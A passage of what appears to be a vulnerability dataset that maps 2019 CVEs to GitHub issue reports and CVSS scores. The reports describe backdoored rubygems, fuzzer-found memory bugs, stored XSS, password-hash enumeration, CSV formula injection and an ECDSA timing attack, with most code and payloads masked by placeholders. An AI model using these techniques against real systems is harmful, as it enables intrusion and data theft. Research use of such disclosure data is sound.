  36956. "severity": "CRITICAL",
  36957. "baseScore": 9.8,
  36958. "impactScore": 5.9,
  36959. "exploitabilityScore": 3.9
  36960. },
  36961. {
  36962. "CVE_ID": "CVE-2019-14281",
  36963. "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2072",
  36964. "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2072",
  36965. "Repo_new": "rubygems/rubygems.org",
  36966. "Issue_Created_At": "2019-07-23T21:52:37Z",
  36967. "description": "datagrid version NUMBERTAG is compromised and a malware, please yank!. Hi, datagrid version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported bootstrap sass malware! FILETAG URLTAG",
  36968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36969. "severity": "CRITICAL",
  36970. "baseScore": 9.8,
  36971. "impactScore": 5.9,
  36972. "exploitabilityScore": 3.9
  36973. },
  36974. {
  36975. "CVE_ID": "CVE-2019-14282",
  36976. "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2073",
  36977. "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2073",
  36978. "Repo_new": "rubygems/rubygems.org",
  36979. "Issue_Created_At": "2019-07-23T21:54:36Z",
  36980. "description": "simple_captcha2 version NUMBERTAG is compromised and a malware, please yank!. Hi, simple_captcha2 version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported bootstrap sass malware! It leaves a backdoor on the affected server. FILETAG URLTAG",
  36981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36982. "severity": "CRITICAL",
  36983. "baseScore": 9.8,
  36984. "impactScore": 5.9,
  36985. "exploitabilityScore": 3.9
  36986. },
  36987. {
  36988. "CVE_ID": "CVE-2019-14295",
  36989. "Issue_Url_old": "https://github.com/upx/upx/issues/286",
  36990. "Issue_Url_new": "https://github.com/upx/upx/issues/286",
  36991. "Repo_new": "upx/upx",
  36992. "Issue_Created_At": "2019-07-19T06:15:54Z",
  36993. "description": "Integer overflow in function APITAG at APITAG APITAG What's the problem (or question)? upx.out l APITAG /dev/null An issue was discovered in up NUMBERTAG There is a/an Integer overflow in function APITAG at APITAG In the add operation, the result of (p >sh_size + p >sh_offset) is equal to zero because of overflow. So the execution can pass the condition check on line NUMBERTAG and applicate excessive memory line NUMBERTAG resulting in denial of service. What should have happened? list compressed file Do you have an idea for a solution? check for integer overflow correctly How can we reproduce the issue? upx.out l APITAG /dev/null the poc is attached source ERRORTAG debug ERRORTAG bug report ERRORTAG Please tell us details about your environment. UPX version used ( APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz",
  36994. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36995. "severity": "MEDIUM",
  36996. "baseScore": 5.5,
  36997. "impactScore": 3.6,
  36998. "exploitabilityScore": 1.8
  36999. },
  37000. {
  37001. "CVE_ID": "CVE-2019-14296",
  37002. "Issue_Url_old": "https://github.com/upx/upx/issues/287",
  37003. "Issue_Url_new": "https://github.com/upx/upx/issues/287",
  37004. "Repo_new": "upx/upx",
  37005. "Issue_Created_At": "2019-07-19T06:25:38Z",
  37006. "description": "APITAG overflow. APITAG What's the problem (or question)? An issue was discovered in up NUMBERTAG There is a/an buffer overflow in function APITAG at APITAG upx.out l APITAG /dev/null What should have happened? list compressed file Do you have an idea for a solution? check for buffer overflow correctly How can we reproduce the issue? upx.out l APITAG /dev/null source ERRORTAG debug CODETAG bug report ERRORTAG Please tell us details about your environment. UPX version used ( APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz",
  37007. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37008. "severity": "HIGH",
  37009. "baseScore": 7.8,
  37010. "impactScore": 5.9,
  37011. "exploitabilityScore": 1.8
  37012. },
  37013. {
  37014. "CVE_ID": "CVE-2019-14315",
  37015. "Issue_Url_old": "https://github.com/sunhater/kcfinder/issues/180",
  37016. "Issue_Url_new": "https://github.com/sunhater/kcfinder/issues/180",
  37017. "Repo_new": "sunhater/kcfinder",
  37018. "Issue_Created_At": "2019-07-09T10:35:32Z",
  37019. "description": "Cross site Scripting Vulnerability. I discovered XSS vulnerability in kcfinder version NUMBERTAG test2. Payload > curl PATHTAG );} APITAG APITAG Response ERRORTAG Vulnerable code in file PATHTAG line NUMBERTAG ERRORTAG a var APITAG was not escape by APITAG",
  37020. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37021. "severity": "MEDIUM",
  37022. "baseScore": 6.1,
  37023. "impactScore": 2.7,
  37024. "exploitabilityScore": 2.8
  37025. },
  37026. {
  37027. "CVE_ID": "CVE-2019-14318",
  37028. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/869",
  37029. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/869",
  37030. "Repo_new": "weidai11/cryptopp",
  37031. "Issue_Created_At": "2019-07-26T04:49:09Z",
  37032. "description": "ECDSA timing leaks. From a private email by J\u00e1n Jan\u010d\u00e1r: > Message ID NUMBERTAG bd NUMBERTAG e NUMBERTAG e9 c NUMBERTAG EMAILTAG uni.cz> > Subject: Vulnerability disclosure > ... > > During our research into security of elliptic curve cryptography implementations on smart cards and in software libraries NUMBERTAG we have discovered timing leakage in the ECDSA signature generation in the Crypto++ library. > > Vulnerability description > > When performing ECDSA over binary field curves, Crypto++ leaks the bit length of the nonce used in scalar multiplication. It also leaks some other currently unknown information, see the attached plots, specifically the APITAG plot. > > This leakage can be abused if an attacker is able to measure the duration of signing of a few hundreds or thousands of known messages. The attacker can then use a lattice attack based on the Hidden Number Problem NUMBERTAG to reconstruct the private key used, as demonstrated in NUMBERTAG even remotely!). > > See the attached plots and heatmaps for details of the leakage on the standard sect NUMBERTAG r1 curve. based on the level of noise present in the attacker's measurements (the lattice attack is very sensitive to noise) and willingness to trade off computation time, the attack would require from NUMBERTAG to NUMBERTAG k signatures. > > The private key recovery itself, assuming a noise free set of just enough signatures, would then take a few minutes. The leakage is somewhat present in ECDSA over prime field curves as well, but much smaller, I do not know the cause of this NUMBERTAG APITAG URLTAG NUMBERTAG D. Boneh, R. Venkatesan: Hardness of computing the most significant bits of secret keys in Diffie Hellman and related schemes; FILETAG PATHTAG NUMBERTAG B. B. Brumley, N. Tuveri: Remote Timing Attacks are Still Practical; FILETAG >",
  37033. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  37034. "severity": "MEDIUM",
  37035. "baseScore": 5.9,
  37036. "impactScore": 3.6,
  37037. "exploitabilityScore": 2.2
  37038. },
  37039. {
  37040. "CVE_ID": "CVE-2019-14323",
  37041. "Issue_Url_old": "https://github.com/troglobit/ssdp-responder/issues/1",
  37042. "Issue_Url_new": "https://github.com/troglobit/ssdp-responder/issues/1",
  37043. "Repo_new": "troglobit/ssdp-responder",
  37044. "Issue_Created_At": "2019-07-23T18:26:42Z",
  37045. "description": "Stack based buffer overflow in ssdp_recv. SSDP responder (from version NUMBERTAG up to latest NUMBERTAG incorrectly handles incoming network messages leading to a stack based buffer overwrite by NUMBERTAG byte. This will result in crash of the server, but only when strict stack checking is enabled. Error message WITH Address Sanitizer: sudo ./ssdpd d ssdpd FILETAG",
  37046. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37047. "severity": "HIGH",
  37048. "baseScore": 7.5,
  37049. "impactScore": 3.6,
  37050. "exploitabilityScore": 3.9
  37051. },
  37052. {
  37053. "CVE_ID": "CVE-2019-14349",
  37054. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1358",
  37055. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1358",
  37056. "Repo_new": "espocrm/espocrm",
  37057. "Issue_Created_At": "2019-07-18T13:41:38Z",
  37058. "description": "Stored in XSS in filename. Description APITAG version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in functionality for storing documents in account tab. Attacker can upload specially crafted file, which contains javascript code in its name. Malicious javascript code will be executed when user open page of any profile there is a file with javascript in filename. But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite) Request ERRORTAG Vulnerable parameters APITAG and name APITAG APITAG",
  37059. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37060. "severity": "MEDIUM",
  37061. "baseScore": 6.1,
  37062. "impactScore": 2.7,
  37063. "exploitabilityScore": 2.8
  37064. },
  37065. {
  37066. "CVE_ID": "CVE-2019-14350",
  37067. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1356",
  37068. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1356",
  37069. "Repo_new": "espocrm/espocrm",
  37070. "Issue_Created_At": "2019-07-18T13:23:57Z",
  37071. "description": "Stored XSS in Knowledge base. Description Current version of APITAG NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in Knowledge base. Malicious attacker can inject APITAG code in the \"body\" parameter during knowledge base record creation. APITAG contains a link, which will execute javascript code after being clicked. APITAG Make the following request (insert your authentication data and hostname) CODETAG FILETAG",
  37072. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37073. "severity": "MEDIUM",
  37074. "baseScore": 6.1,
  37075. "impactScore": 2.7,
  37076. "exploitabilityScore": 2.8
  37077. },
  37078. {
  37079. "CVE_ID": "CVE-2019-14351",
  37080. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1357",
  37081. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1357",
  37082. "Repo_new": "espocrm/espocrm",
  37083. "Issue_Created_At": "2019-07-18T13:37:09Z",
  37084. "description": "User password hash enumeration. Description Current version of APITAG NUMBERTAG is vulnerable to user's password hash enumeration. Malicious authenticated attacker can bruteforce user password hash by NUMBERTAG symbol at a time using specially crafted filters. APITAG Make a following request in your browser: APITAG ` If user password hash starts with \"AAAA\" the request will result with information about this user, if not the result will be empty.",
  37085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  37086. "severity": "HIGH",
  37087. "baseScore": 8.8,
  37088. "impactScore": 5.9,
  37089. "exploitabilityScore": 2.8
  37090. },
  37091. {
  37092. "CVE_ID": "CVE-2019-14352",
  37093. "Issue_Url_old": "https://github.com/jogetworkflow/jw-community/issues/20",
  37094. "Issue_Url_new": "https://github.com/jogetworkflow/jw-community/issues/20",
  37095. "Repo_new": "jogetworkflow/jw-community",
  37096. "Issue_Created_At": "2019-07-15T23:08:14Z",
  37097. "description": "CSV Injection APITAG NUMBERTAG to High NUMBERTAG Description CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Details The web application embeds untrusted user input inside the CSV file. In this case a simple formula was used but an attacker can use a malicious formula that might download a file from the internet and have it executed to gain access. The following shows the CSV injection point: APITAG Download the CSV: APITAG Open the CSV file and observe the output: APITAG Impact When a spreadsheet program such as Microsoft Excel or APITAG Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVETAG Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website Exfiltrating contents from the spreadsheet, or other open spreadsheets. Recommendation This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters: Equals to (\"=\") Plus (\"+\") Minus (\" \") At (\" APITAG References URLTAG",
  37098. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37099. "severity": "HIGH",
  37100. "baseScore": 7.8,
  37101. "impactScore": 5.9,
  37102. "exploitabilityScore": 1.8
  37103. },
  37104. {
  37105. "CVE_ID": "CVE-2019-14368",
  37106. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/952",
  37107. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/952",
  37108. "Repo_new": "exiv2/exiv2",
  37109. "Issue_Created_At": "2019-07-12T02:22:41Z",
  37110. "description": "APITAG heap buffer overflow in APITAG Describe the bug in my research , a heap overflow found in APITAG To Reproduce exi NUMBERTAG pr $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
  37111. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37112. "severity": "HIGH",
  37113. "baseScore": 7.8,
  37114. "impactScore": 5.9,
  37115. "exploitabilityScore": 1.8
  37116. },
  37117. {
  37118. "CVE_ID": "CVE-2019-14369",
  37119. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/953",
  37120. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/953",
  37121. "Repo_new": "exiv2/exiv2",
  37122. "Issue_Created_At": "2019-07-12T03:07:03Z",
  37123. "description": "APITAG heap buffer overflow in APITAG APITAG Describe the bug in my research , a heap overflow found in APITAG APITAG APITAG To Reproduce exi NUMBERTAG pv $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
  37124. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37125. "severity": "MEDIUM",
  37126. "baseScore": 6.5,
  37127. "impactScore": 3.6,
  37128. "exploitabilityScore": 2.8
  37129. },
  37130. {
  37131. "CVE_ID": "CVE-2019-14370",
  37132. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/954",
  37133. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/954",
  37134. "Repo_new": "exiv2/exiv2",
  37135. "Issue_Created_At": "2019-07-12T06:36:56Z",
  37136. "description": "heap buffer overflow in APITAG APITAG . Describe the bug in my research , a heap overflow found in APITAG PATHTAG To Reproduce exi NUMBERTAG pv $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
  37137. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37138. "severity": "MEDIUM",
  37139. "baseScore": 6.5,
  37140. "impactScore": 3.6,
  37141. "exploitabilityScore": 2.8
  37142. },
  37143. {
  37144. "CVE_ID": "CVE-2019-14373",
  37145. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/541",
  37146. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/541",
  37147. "Repo_new": "flif-hub/flif",
  37148. "Issue_Created_At": "2019-07-22T02:04:00Z",
  37149. "description": "heap buffer overflow in png_set_text NUMBERTAG in my research in FLIF, a craft file can cause a heap overflow in libpng. I wonder wheather it is the bug with FLIF or libpng. flif overwrite d $poc FILETAG FILETAG asan output ERRORTAG",
  37150. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37151. "severity": "HIGH",
  37152. "baseScore": 7.8,
  37153. "impactScore": 5.9,
  37154. "exploitabilityScore": 1.8
  37155. },
  37156. {
  37157. "CVE_ID": "CVE-2019-14379",
  37158. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2387",
  37159. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2387",
  37160. "Repo_new": "fasterxml/jackson-databind",
  37161. "Issue_Created_At": "2019-07-23T06:28:01Z",
  37162. "description": "A new gadgets to exploit default typing issue in jackson databind. Hey,buddy. I found a new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to EMAILTAG .",
  37163. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37164. "severity": "CRITICAL",
  37165. "baseScore": 9.8,
  37166. "impactScore": 5.9,
  37167. "exploitabilityScore": 3.9
  37168. },
  37169. {
  37170. "CVE_ID": "CVE-2019-14431",
  37171. "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/30",
  37172. "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/30",
  37173. "Repo_new": "matrixssl/matrixssl",
  37174. "Issue_Created_At": "2019-07-23T16:50:11Z",
  37175. "description": "Heap based buffer overflow while parsing DTLS messages APITAG APITAG DTLS server (in all publicly released versions including NUMBERTAG OPEN) incorrectly handles incoming network messages leading to heap buffer overwrite up to NUMBERTAG bytes and possible Remote Code Execution. After processing crafted packet server incorrectly handles fragment length value provided in DTLS message. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: matrixssl NUMBERTAG open$ PATHTAG p NUMBERTAG DTLS server running on port NUMBERTAG Select woke NUMBERTAG Got REQUEST_RECV from APITAG Error in PATHTAG APITAG memory corruption NUMBERTAG cde0 ======= Backtrace: ========= PATHTAG NUMBERTAG e5) FILETAG",
  37176. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37177. "severity": "CRITICAL",
  37178. "baseScore": 9.8,
  37179. "impactScore": 5.9,
  37180. "exploitabilityScore": 3.9
  37181. },
  37182. {
  37183. "CVE_ID": "CVE-2019-14439",
  37184. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2389",
  37185. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2389",
  37186. "Repo_new": "fasterxml/jackson-databind",
  37187. "Issue_Created_At": "2019-07-24T18:19:41Z",
  37188. "description": "Placeholder for another \"default typing\" CVE. Another reported arrived, wrt logback/JNDI. Need to file an CVE, probably block.",
  37189. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  37190. "severity": "HIGH",
  37191. "baseScore": 7.5,
  37192. "impactScore": 3.6,
  37193. "exploitabilityScore": 3.9
  37194. },
  37195. {
  37196. "CVE_ID": "CVE-2019-14459",
  37197. "Issue_Url_old": "https://github.com/phaag/nfdump/issues/171",
  37198. "Issue_Url_new": "https://github.com/phaag/nfdump/issues/171",
  37199. "Repo_new": "phaag/nfdump",
  37200. "Issue_Created_At": "2019-07-07T08:29:49Z",
  37201. "description": "Integer overflow in APITAG (ipfix.c) . Hi! I found an integer overflow at function APITAG that can be abused in order to crash the process remotely (denial of service): CODETAG The function uses APITAG as uint NUMBERTAG t which is an unsigned integer (only can holds values between NUMBERTAG and NUMBERTAG so if we have a APITAG with value NUMBERTAG when the substraction at line NUMBERTAG is done ( APITAG ), it will overflow and become NUMBERTAG fffffffd). As this is a value higher than NUMBERTAG the size check made at line NUMBERTAG APITAG ) will be bypassed. At this point we have a huge loop ( APITAG ) where the pointer APITAG will be increased by NUMBERTAG in each iteration until it reaches an invalid memory address and segfaults. I hope this information can be useful. Best regards, Juan Manuel Fernandez",
  37202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37203. "severity": "HIGH",
  37204. "baseScore": 7.5,
  37205. "impactScore": 3.6,
  37206. "exploitabilityScore": 3.9
  37207. },
  37208. {
  37209. "CVE_ID": "CVE-2019-14464",
  37210. "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/184",
  37211. "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/184",
  37212. "Repo_new": "milkytracker/milkytracker",
  37213. "Issue_Created_At": "2019-07-30T16:54:00Z",
  37214. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in APITAG L ERRORTAG . Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37215. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37216. "severity": "MEDIUM",
  37217. "baseScore": 5.5,
  37218. "impactScore": 3.6,
  37219. "exploitabilityScore": 1.8
  37220. },
  37221. {
  37222. "CVE_ID": "CVE-2019-14465",
  37223. "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/198",
  37224. "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/198",
  37225. "Repo_new": "schismtracker/schismtracker",
  37226. "Issue_Created_At": "2019-07-30T20:06:50Z",
  37227. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing Schism Tracker with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in mtm.c L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37228. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37229. "severity": "HIGH",
  37230. "baseScore": 7.8,
  37231. "impactScore": 5.9,
  37232. "exploitabilityScore": 1.8
  37233. },
  37234. {
  37235. "CVE_ID": "CVE-2019-14491",
  37236. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15125",
  37237. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15125",
  37238. "Repo_new": "opencv/opencv",
  37239. "Issue_Created_At": "2019-07-23T03:32:04Z",
  37240. "description": "out of bounds read in function APITAG . APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler => clang NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG there is an out of bounds read in function APITAG in APITAG which leads to denial of service. source CODETAG debug CODETAG bug report ERRORTAG others from fuzz project pwd opencv classifier NUMBERTAG crash name FILETAG Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. Steps to reproduce commandline classifier PATHTAG APITAG FILETAG",
  37241. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  37242. "severity": "HIGH",
  37243. "baseScore": 8.2,
  37244. "impactScore": 4.2,
  37245. "exploitabilityScore": 3.9
  37246. },
  37247. {
  37248. "CVE_ID": "CVE-2019-14492",
  37249. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15124",
  37250. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15124",
  37251. "Repo_new": "opencv/opencv",
  37252. "Issue_Created_At": "2019-07-23T03:20:37Z",
  37253. "description": "out of bounds read/write in Function APITAG APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => :ubuntu NUMBERTAG LTS: Compiler => : clang NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG there is an out of bounds read/write in Function APITAG in APITAG which leads to denial of service. src CODETAG debug CODETAG Steps to reproduce APITAG FILETAG",
  37254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37255. "severity": "HIGH",
  37256. "baseScore": 7.5,
  37257. "impactScore": 3.6,
  37258. "exploitabilityScore": 3.9
  37259. },
  37260. {
  37261. "CVE_ID": "CVE-2019-14493",
  37262. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15127",
  37263. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15127",
  37264. "Repo_new": "opencv/opencv",
  37265. "Issue_Created_At": "2019-07-23T03:36:46Z",
  37266. "description": "null pointer dereference in function APITAG . APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler => clang NUMBERTAG Detailed description description An issue was discovered in openc NUMBERTAG There is a null pointer dereference in function APITAG at APITAG NUMBERTAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd opencv classifier NUMBERTAG crash name FILETAG Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. Steps to reproduce commandline classifier PATHTAG APITAG FILETAG",
  37267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37268. "severity": "HIGH",
  37269. "baseScore": 7.5,
  37270. "impactScore": 3.6,
  37271. "exploitabilityScore": 3.9
  37272. },
  37273. {
  37274. "CVE_ID": "CVE-2019-14496",
  37275. "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/183",
  37276. "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/183",
  37277. "Repo_new": "milkytracker/milkytracker",
  37278. "Issue_Created_At": "2019-07-29T18:09:01Z",
  37279. "description": "Stack based buffer overflow in the APITAG function. Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a stack based buffer overflow in APITAG in APITAG L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37280. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37281. "severity": "HIGH",
  37282. "baseScore": 7.8,
  37283. "impactScore": 5.9,
  37284. "exploitabilityScore": 1.8
  37285. },
  37286. {
  37287. "CVE_ID": "CVE-2019-14497",
  37288. "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/182",
  37289. "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/182",
  37290. "Repo_new": "milkytracker/milkytracker",
  37291. "Issue_Created_At": "2019-07-29T18:06:21Z",
  37292. "description": "Stack based buffer overflow in APITAG Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a stack based buffer overflow in APITAG in APITAG L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  37293. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37294. "severity": "HIGH",
  37295. "baseScore": 7.8,
  37296. "impactScore": 5.9,
  37297. "exploitabilityScore": 1.8
  37298. },
  37299. {
  37300. "CVE_ID": "CVE-2019-14517",
  37301. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/709",
  37302. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/709",
  37303. "Repo_new": "pandao/editor.md",
  37304. "Issue_Created_At": "2019-07-22T13:23:07Z",
  37305. "description": "XSS Vulnerability in APITAG label. Test Environment Google Chrome Version NUMBERTAG APITAG Build NUMBERTAG bit) Description A malicious actor may insert and finally execute malicious Javascript code. Steps to reproduce NUMBERTAG Go to FILETAG or any open FILETAG apps NUMBERTAG In the edit mode, input the following malicious code snippet: APITAG Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Expected Results No malicious Javascript code should be executed Remediation In general, it is highly recommended to implement input validation, output sanitization and escaping. Proof of Concept FILETAG",
  37306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37307. "severity": "MEDIUM",
  37308. "baseScore": 6.1,
  37309. "impactScore": 2.7,
  37310. "exploitabilityScore": 2.8
  37311. },
  37312. {
  37313. "CVE_ID": "CVE-2019-14518",
  37314. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1041",
  37315. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1041",
  37316. "Repo_new": "evolution-cms/evolution",
  37317. "Issue_Created_At": "2019-03-22T14:11:43Z",
  37318. "description": "Stored Cross Site Scripting. Stored Cross Site Scripting Vulnerability Risk Description Stored cross site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious APITAG code into the application, which will execute within the browser of any user who views the relevant application content. The attacker supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out of band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application). Stored cross site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations, this can be used to create web application worms that spread exponentially and ultimately exploit all active users. POC: Let's see welcome before login FILETAG Login to the Application FILETAG Go to the Template Location and add new template FILETAG add xss payload in description and new category location using APITAG APITAG FILETAG Save and exit the template location will get xss popup FILETAG Mitigation: Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if 